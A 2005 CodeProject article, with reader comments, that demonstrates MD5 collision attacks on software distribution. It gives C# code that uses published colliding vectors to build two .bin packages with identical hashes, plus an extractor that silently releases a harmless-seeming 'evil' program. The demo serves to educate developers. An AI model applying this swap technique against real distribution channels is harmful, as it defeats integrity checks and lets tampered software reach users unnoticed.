Introduction
In my previous article Good Bye MD5, I introduced you to the current findings on cryptology and MD5 collision detection. A debate started, and most of the people think that these findings are not a serious issue.
Microsoft agreed that this is an important issue:
"Microsoft is banning certain cryptographic functions from new computer code, citing increasingly sophisticated attacks that make them less secure, according to a company executive".
"The Redmond, Wash., software company instituted a new policy for all developers that bans functions using the DES, MD4, MD5 and, in some cases, the SHA1 encryption algorithm, which is becoming "creaky at the edges," said Michael Howard, senior security program manager at the company, Howard said". Source: Microsoft Scraps Old Encryption in New Code
We now have some proofs of concept, like a pair of X.509 colliding certificates and a spectacular example of a pair of postscript documents, with the same MD5 hash value, you can read about this in the excellent paper, Attacking Hash Functions by Poisoned Messages "The Story of Alice and her Boss".
How to exploit the collisions
There is a known result about MD5 hash function:
If MD5(x) == MD5(y) then MD5(x+q) == MD5(y+q)
So, if you have a pair of messages, x and y, with the same MD5 value, you can append a payload q, the MD5 value remains the same, the size of q is arbitrary. You need a pair of vectors, x and y to do the exploit. You can try to find a pair for yourself, but we already have a pair of values, given by the Chinese investigators Joux and Wang. A practical use of this pair of vector values is explained in the paper MD5 To Be Considered Harmful Someday, by Dan Kaminsky.
In my blog, I have written about these issues, and now I want to show you how you can make an exploit using these vectors.
Hacking software distribution
The proof of concept to be shown in this article has the following scenario:
- This is a simulated software distribution mechanism.
- The software is distributed in binary format, in files with .bin extension.
- Exists as an extraction program that checks and extracts the software from the .bin file.
- For verification purpose, we use the MD5 value to check the integrity of the .bin files.
This picture shows a scenario, where a pair of binary files with the same MD5 are generated, MD5(good.bin) == MD5(evil.bin):

Attacking the distribution software
First, we will build a generator program, this program takes a pair of executables, the first is a harmless program and the second the evil file, is a harmful program, and generates a pair of binary distribution files (.bin files). These are good.bin distribution file, and an evil.bin distribution file.
The good program
The code of the harmless program is simple:
namespace GoodExe
{
class Class1
{
[STAThread]
static void Main(string[] args)
{
Console.WriteLine ("this is a good executable");
}
}
}
The evil program
This is the code of the evil program, that simulates a harmful behavior:
using System;
using System.Threading;
namespace EvilExe
{
class Class1
{
[STAThread]
static void Main(string[] args)
{
Console.WriteLine ("This is an evil file");
Console.WriteLine ("Formatting your hard drive...");
Thread.Sleep(2000);
Console.WriteLine ("Just joking...");
}
}
}
The collision generator
We have a pair of vectors with the same MD5 value:
static byte[] vec1 =
{
0xd1, 0x31, 0xdd, 0x02, 0xc5, 0xe6
, 0xee , 0xc4 , 0x69 , 0x3d, 0x9a , 0x06
, 0x98 , 0xaf , 0xf9 , 0x5c , 0x2f , 0xca
, 0xb5 , 0x87 , 0x12 , 0x46 , 0x7e
, 0xab , 0x40 , 0x04 , 0x58 , 0x3e , 0xb8
, 0xfb , 0x7f , 0x89 , 0x55 , 0xad
, 0x34 , 0x06 , 0x09 , 0xf4 , 0xb3 , 0x02
, 0x83 , 0xe4 , 0x88 , 0x83 , 0x25
, 0x71 , 0x41 , 0x5a, 0x08 , 0x51 , 0x25
, 0xe8 , 0xf7 , 0xcd , 0xc9 , 0x9f ,
0xd9 , 0x1d , 0xbd , 0xf2 , 0x80 , 0x37
, 0x3c , 0x5b , 0xd8 , 0x82 , 0x3e
, 0x31 , 0x56 , 0x34 , 0x8f , 0x5b , 0xae
, 0x6d , 0xac , 0xd4 , 0x36 , 0xc9
, 0x19 , 0xc6 , 0xdd , 0x53 , 0xe2 , 0xb4
, 0x87 , 0xda , 0x03 , 0xfd , 0x02
, 0x39 , 0x63 , 0x06 , 0xd2 , 0x48 , 0xcd
, 0xa0 , 0xe9 , 0x9f , 0x33 , 0x42
, 0x0f , 0x57 , 0x7e , 0xe8 , 0xce , 0x54
, 0xb6 , 0x70 , 0x80 , 0xa8 , 0x0d
, 0x1e , 0xc6 , 0x98 , 0x21 , 0xbc , 0xb6
, 0xa8 , 0x83 , 0x93 , 0x96 , 0xf9
, 0x65 , 0x2b , 0x6f , 0xf7 , 0x2a , 0x70
};
static byte[] vec2 =
{
0xd1 , 0x31, 0xdd , 0x02 , 0xc5 , 0xe6
, 0xee , 0xc4 , 0x69 , 0x3d , 0x9a , 0x06
, 0x98 , 0xaf , 0xf9 , 0x5c, 0x2f , 0xca
, 0xb5 , 0x07 , 0x12 , 0x46 , 0x7e
, 0xab , 0x40 , 0x04 , 0x58 , 0x3e , 0xb8
, 0xfb , 0x7f , 0x89 , 0x55 , 0xad
, 0x34 , 0x06 , 0x09 , 0xf4 , 0xb3 , 0x02
, 0x83 , 0xe4 , 0x88 , 0x83 , 0x25
, 0xf1 , 0x41 , 0x5a , 0x08 , 0x51 , 0x25
, 0xe8 , 0xf7 , 0xcd , 0xc9 , 0x9f
, 0xd9 , 0x1d , 0xbd , 0x72 , 0x80
, 0x37 , 0x3c , 0x5b, 0xd8 , 0x82
, 0x3e , 0x31 , 0x56 , 0x34 , 0x8f , 0x5b
, 0xae , 0x6d , 0xac , 0xd4 , 0x36
, 0xc9 , 0x19 , 0xc6 , 0xdd , 0x53 , 0xe2
, 0x34 , 0x87 , 0xda , 0x03 , 0xfd
, 0x02 , 0x39 , 0x63 , 0x06 , 0xd2 , 0x48
, 0xcd , 0xa0, 0xe9 , 0x9f , 0x33
, 0x42 , 0x0f , 0x57 , 0x7e , 0xe8 , 0xce
, 0x54 , 0xb6 , 0x70 , 0x80 , 0x28
, 0x0d , 0x1e, 0xc6 , 0x98 , 0x21 , 0xbc
, 0xb6 , 0xa8 , 0x83 , 0x93 , 0x96
, 0xf9 , 0x65 , 0xab
, 0x6f , 0xf7 , 0x2a , 0x70
};
Remember that given this pair of vectors, if we have a payload of any size, then MD5(vec1+payload) == MD5(vec2+payload). The payload is built in this way, the length of good file, the length of evil file, the content of the good file, and the content of the evil file.
The core of the generation program is shown below:
[STAThread]
static void Main(string[] args)
{
if (args.Length != 2)
Usage();
byte[] goodFile = ReadBinaryFile(args[0]);
byte[] evilFile = ReadBinaryFile(args[1]);
WriteBinary("good.bin", vec1, goodFile, evilFile);
WriteBinary("evil.bin", vec2, goodFile, evilFile);
ShowMD5("good.bin");
ShowMD5("evil.bin");
}
private static void Usage ()
{
Console.WriteLine("Usage: md5gen good_file evil_file");
Environment.Exit (-1);
}
private static void WriteBinary (string sOutFileName,
byte[] prefix, byte[] goodFile, byte[] evilFile)
{
using (FileStream fs = File.OpenWrite (sOutFileName))
{
using (BinaryWriter writer = new BinaryWriter(fs))
{
writer.Write(prefix);
writer.Write ( goodFile.Length );
writer.Write ( evilFile.Length );
fs.Write (goodFile, 0, goodFile.Length);
fs.Write (evilFile, 0, evilFile.Length);
fs.Close ();
}
}
}
If we apply the generator program to the pair of programs, we generate a pair of files, good.bin and evil.bin in the following way:
C:\TEMP>md5clone goodexe.exe evilexe.exe
MD5 Hash for good.bin is 1D8EE13FBA00DD022F002AAD0E3EF9C7
MD5 Hash for evil.bin is 1D8EE13FBA00DD022F002AAD0E3EF9C7
Now, we can publish good.bin in the Internet for people to download it, and later, we can replace it with evil.bin. Now, the users will get infected, without noticing and convinced that there is no tampering, because the MD5 signature is the same for both files, in others words we have MD5(good.bin) == MD5(evil.bin).
The extractor program
Now, suppose we have changed the extractor program, with our own version. Our extractor receives the .bin distribution file, and extracts the good or evil program based on the prefix vector at the beginning of the .bin file. We use the byte at position 123 to detect the vector that is used for the prefix.
The code of the extractor is very simple:
[STAThread]
static void Main(string[] args)
{
if (args.Length == 0)
Usage();
ExtractFile(args[0], args[1]);
}
private static void ExtractFile (string sfilename,
string soutputfile)
{
using (BinaryReader reader =
new BinaryReader(File.OpenRead (sfilename)))
{
byte[] vec = reader.ReadBytes (128);
int goodSize = reader.ReadInt32 ();
int evilSize = reader.ReadInt32 ();
if (vec[123] == 0xab)
{
reader.ReadBytes (goodSize);
byte[] evil = reader.ReadBytes (evilSize);
using (BinaryWriter writer =
new BinaryWriter(File.OpenWrite (soutputfile)))
{
writer.Write (evil);
writer.Close ();
}
}
else
{
byte[] good = reader.ReadBytes (goodSize);
using (BinaryWriter writer =
new BinaryWriter(File.OpenWrite (soutputfile)))
{
writer.Write (good);
writer.Close ();
}
}
Console.WriteLine ("File written on {0}",
soutputfile);
}
}
private static void Usage ()
{
Console.WriteLine(
"Usage: md5extract file.bin output_file.exe");
Environment.Exit (-1);
}
Suppose, you receive the good.bin file, then you apply the extractor on good.bin and the good.exe file is extracted. But if you receive the evil.bin file, then the extractor will extract the evil.exe, i.e. the harmful executable. Remember that MD5(evil.bin) == MD5(good.bin).
Conclusion
Recently, the world of cryptographic hash functions was on crisis. A lot of researchers announced "attacks" to find collisions for common hash functions such as MD5 and SHA-1. "For cryptographers, these results are exciting - but many so-called "practitioners" turned them down as practically irrelevant".
I hope, this proof of concept will convince you that there is a serious issue with MD5.
"There have already been a few exploits of the collision-finding attacks against MD5: Kaminski [Ka] and Mikle [Mi] presented different executables with the same MD5 hash. One of Kaminski's executables was quite harmless, the other one very harmful. Mikle's executables were self-extracting archives, extracting different stuffs. Lenstra, Wang and de Weger [LWdW,LdW] constructed colliding X.509 certificates".
This article shows how a failure on the software distribution chain, allows exploiting the current findings on cryptology about the MD5 hash function.
History
- September 20th, 2005: Some grammar correction, and title modified.
|
|
 |
 | Certificate collision MilanTomic78 | 0:49 14 Oct '05 |
|
 |
Can your code/example/article be used to create two certificates with the same MD5 signatures? Where can I find such info?
|
|
|
|
 |
|
|
 |
 | Caesar and Alice was better Anonymous | 15:32 23 Sep '05 |
|
 |
This is interesting but semantically identical to the original Caesar and Alice example. I do agree with some of the sentiments made by others that it doesn't offer a lot because it is so contrived. Having a custom extractor that is part of the evil mechanism is not as elegant as using inherent postscript functions.
I'm sure with some thought that smart hackers will find more 'natural' / socially acceptable ways of using these MD5 collisions to deliver evil payloads.
|
|
|
|
 |
|
 |
Sure, the Caesar an Alice example is more elegant. Sadly, it doesn't work with Adobe. The _extractor_ and the _prostcript interpreter_ are, as you say, semantically identical. The fact is that I want tu divulgate this issues to a broader community of developers to be aware of this problems.
Thanks for your comments.
Eduardo Diaz
site | english blog | spanish blog
|
|
|
|
 |
 | Security is a process ediazc | 8:44 23 Sep '05 |
|
 |
Many of the comments received are nice. However some of them don't get the point of the article. The sample is adhoc, and simulate a part of a software distribution process. The fact that MD5(x) == MD5(y) => MD5(x+q) == MD5(y+q) is the real problem.
In fact this exploit can be seen this way:
MD5(x+ccode+trusted_file) == MD5(y+ccode+trusted_file+evil_file)
then, if you have an interpreter that ignores the prefixes x, and y, an you are able to put your conditional code (ccode) then you don't need the extractor.
You can't trust on MD5 hashes, because the previous property.
Eduardo Diaz
site | english blog | spanish blog
|
|
|
|
 |
 | this is stupid ahurwitz | 6:21 23 Sep '05 |
|
 |
if the good program includes the evil program (and vice versa), then you are really not demonstrating anything interesting here. this is a waste of time. i can't believe this crap got on slashdot.
|
|
|
|
 |
|
 |
Well, somebody *is* stupid, definitely. Did you read the introduction, at least? Oh, ok, here it is: the point is that you can have two different programs with the same MD5 checksum. That enables malicious people to send you some program with, for example, some backdoor built in (so they can enter your system at will), all the while you happily check the MD5 checksum and think that everything is nice and clean.
Refrain from derogatory comments, they make *you* look stupid. Even if something, in your opinion, seems wrong, state it clearly. Oh, you are such a waste of time .
-- modified at 12:21 Friday 23rd September, 2005
|
|
|
|
 |
|
 |
if you can include "evil" code inside of "good" code, then technically the "good" code is not good and there is no point in having a second "evil" program because you've already delivered the evil code in the first program. what is outlined here does not actually enable anyone to deliver evil code to anyone else. the delivery of bad code is already done when the user decides to download the first, "good" version.
|
|
|
|
 |
|
 |
what the article is saying, is that you can distribute a "good" file with a specific MD5 sum, then later on, change the "good" file with some other file that is "bad" and since this new "bad" file has the same MD5 sum of the old "good" file, noone would be able to tell that the file is different.
|
|
|
|
 |
|
 |
and i apologize if i offended the author with my comments.
|
|
|
|
 |
|
 |
You really didn't understand what you read. No comments.
|
|
|
|
 |
|
 |
Actually I agree with him. This doesn't prove a thing other than what long known - there has to be collisions. And this can be proven with the pigeon hole principle - you cannot shove more pigeons into a set of pigeon holes than there are pigeon holes. In other words (for MD5) if you have 2 ^ 128 + 1 files then you _must_ have a collision.
Note that (in this example) the md5extractor is part of the "evil" system. _it_ makes the selection between which of the two files are going to be placed back. In short, this attack does not allow me to replace good code for evil code. Not yet anyway. Take for example the way in which Gentoo Linux distributes packages (I'd attack the rsync mechanism in that particular case if I was evil). It stores and MD5 hash of the _good_ code. Now if I want to replace the code with something evil then I don't have code on the "clean" system to begin with - all I've got to work with is replacing the source archive, and the MD5s need to match. I've got no starting matching data and I must generate a _valid_ .tar.gz archive. Suddenly the problem becomes a lot harder again.
Give respect and credit where it is due, to Joux and Xang for actually finding two vectors that produce the same MD5.
I'll be impressed when someone shows me a way to take any arbitrary file and add a small amount of data to that file to get to a particular MD5 (and in the case of .tar.gz still extract without any warnings). Not when someone already has an evil bootstrap on the system under attack. To get md5extractor onto the system (or replace emerge with the evil bootstrap) the system needs to be broken already - what is the point of this attack then?
|
|
|
|
 |
|
 |
Wow. You have utterly misunderstood what this article is about. While is it obvious that MD5 has collissions (as do all hash-forming functions, but definition), the exploit is that if MD5(x) == MD5(y) then MD5(x+p) == MD5(y+p) where p is arbitrary.
Say someone hacked microsoft.com and overwrote the installation for the dotNET framework or microsoft vista beta 2 for instance and used this method to insert an arbitrary program (which is our selected p) into the executable and noone and microsoft would be any-the-wiser because the MD5 checksum would be the same.
Coincidentally the same is also true for MD4, but not SHA1, or SHA256.
|
|
|
|
 |
|
 |
Actually I agree with him. This doesn't prove a thing other than what long known - there has to be collisions. And this can be proven with the pigeon hole principle - you cannot shove more pigeons into a set of pigeon holes than there are pigeon holes. In other words (for MD5) if you have 2 ^ 128 + 1 files then you _must_ have a collision.
Note that (in this example) the md5extractor is part of the "evil" system. _it_ makes the selection between which of the two files are going to be placed back. In short, this attack does not allow me to replace good code for evil code. Not yet anyway. Take for example the way in which Gentoo Linux distributes packages (I'd attack the rsync mechanism in that particular case if I was evil). It stores and MD5 hash of the _good_ code. Now if I want to replace the code with something evil then I don't have code on the "clean" system to begin with - all I've got to work with is replacing the source archive, and the MD5s need to match. I've got no starting matching data and I must generate a _valid_ .tar.gz archive. Suddenly the problem becomes a lot harder again.
Give respect and credit where it is due, to Joux and Xang for actually finding two vectors that produce the same MD5.
I'll be impressed when someone shows me a way to take any arbitrary file and add a small amount of data to that file to get to a particular MD5 (and in the case of .tar.gz still extract without any warnings). Not when someone already has an evil bootstrap on the system under attack. To get md5extractor onto the system (or replace emerge with the evil bootstrap) the system needs to be broken already - what is the point of this attack then?
|
|
|
|
 |
|
 |
You apparently don't get it. The whole point is that, after submitting the good code (with the bad code appended to it, although inert), a malicious programmer could then replace the file with one that has the bad code active, and the good code inert, and the MD5 checksum would be the same.
|
|
|
|
 |
|
 |
No dude, this is too much for you to comprehend so quit arguing senselessly!
xacatecas hit the nail on the head. What Kaminsky and this nut who wrote this C# 'simulation' did is nothing more than a magic trick. Re-read what 'xacatecas' posted above, I'll refrain from reiterating.
Before replying to a post with arrogance, try comprehending the orignal goddamn research.
-x
|
|
|
|
 |
|
 |
Just ignore him. Anyone that reads slashdot is an idiot by definition.
|
|
|
|
 |
|
 |
QFT.
Slashdot is controlled by a few people, which are totally biased and deliver the same type of news everyday. I stopped reading a while ago cause its quality became terrible.
|
|
|
|
 |
 | What would be *really* useful ... CDGuru | 6:06 23 Sep '05 |
|
 |
would be a tool which creates all of the possible "candidate" files from an MD5 value. So, let's say you had the MD5 value of an executable. With this tool you could produce all of the possible original files which result in this MD5 hash value. Most of them will not be well-formed executables, so they could be quickly filtered out.
The remaining files could be further filtered if you had some idea of the size of the original file. Other filtering techniques could be applied to still further reduce the number of possible files.
The end result - possibly after considerable computation time - would be a few files and one of them would be the original executable. Right?
Do not be misled into thinking that this would be some magic that produces the one true file. There would be a significant number of candidates dispite whatever filtering was applied. MD5 is a hash function where multiple sources resolve to the same hash value.
Obviously, there is a brute-force way of doing this, but that would be a rather crude approach. It would seem there would be a mathematical approach that would be significantly better than brute force.
Now that would be really useful.
|
|
|
|
 |
 | Slashdotted Judah Himango | 5:18 23 Sep '05 |
|
 |
Your article has been posted on Slashdot. Check out the story here[^].
Tech, life, family, faith: Give me a visit. I'm currently blogging about: Cops & Robbers
Judah Himango
|
|
|
|
 |
|
|
 |
 | extractor Fred Spiessens | 4:01 23 Sep '05 |
|
 |
Nice example and it's good to know that MD5 collisions can be that easily extended, which is indeed very dangerous. Because the example needs an additional attack on the extractor software, it can trick us into underestimating the problem. There is no need for an extra attack on trusted software that uses the colliding files, if that trusted software is itself not sensitive for the first part of the files.
Consider for example an interpreter that by construction skips a fixed number of bytes at the beginning of the source code files when starting the interpretation, e.g. because the interpreter expects only initialization data at that place. The initialization data will be made available for use and interpretation by the program itself, which starts after the fixed initial space. Now suppose we can fit the colliding payloads of the good an bad source files into that initial space. Our good and bad programs are the same, but what they actually do depends completely on that initial data. In that case, a code analysis of the "good" source code could generate well founded trust about the good program, based on its harmless initialization data. This trust would then extend to the bad program because both the good and the bad source code files have the same hash.
Fred.
|
|
|
|
 |
 | Does this example demonstrate anything? anonymous | 3:58 23 Sep '05 |
|
 |
I haven't downloaded, but based on the cmd window screenshot, you nede to clearly show that the MD5 of good.exe and bad.exe match - not goodexe.exe & badexe.exe for which we can't associate similar or different code.
So here my question relating to demonstation of a compromise:
MD5(x) == MD5(y) then MD5(x+q) == MD5(y+q)
is understood.
So we start out w/ two byte blocks which are known to result in the same hash: x & y Then we embed these in an exe - one exe that does something good and one that does something bad. qx != qy so MD5(x+qx) != MD5(y+qy). Check the md5 sums of good.exe and bad.exe.
Ok. So this is obvious, I must have missed your point. It would be very interesting to show software or a general algorithm which demonstrates the compromise of MD5 in finding x and y such that MD5(x) == MD5(y) other than using brute force. I'm not clear on the application of what is shown here.
|
|
|
|
 |
|
 |
he is actually doing the following:
MD5(good + bad + vector1) == MD5(good + bad + vector2), where MD5(vector1) == MD5(vector2). The extractor program then checks if vector1 or vector2 was used to create the binary package, and extracts the good or bad exe depending on that condition.
|
|
|
|
 |
 | file size eean | 1:47 23 Sep '05 |
|
 |
I'm confused, are these two files with the same md5sum's the same file size? MD5 sums are meant to be compared againist files of the same file size after all.
|
|
|
|
 |
|
|
Last Updated 20 Sep 2005 |
Advertise |
Privacy |
Terms of Use |
Copyright ©
CodeProject, 1999-2010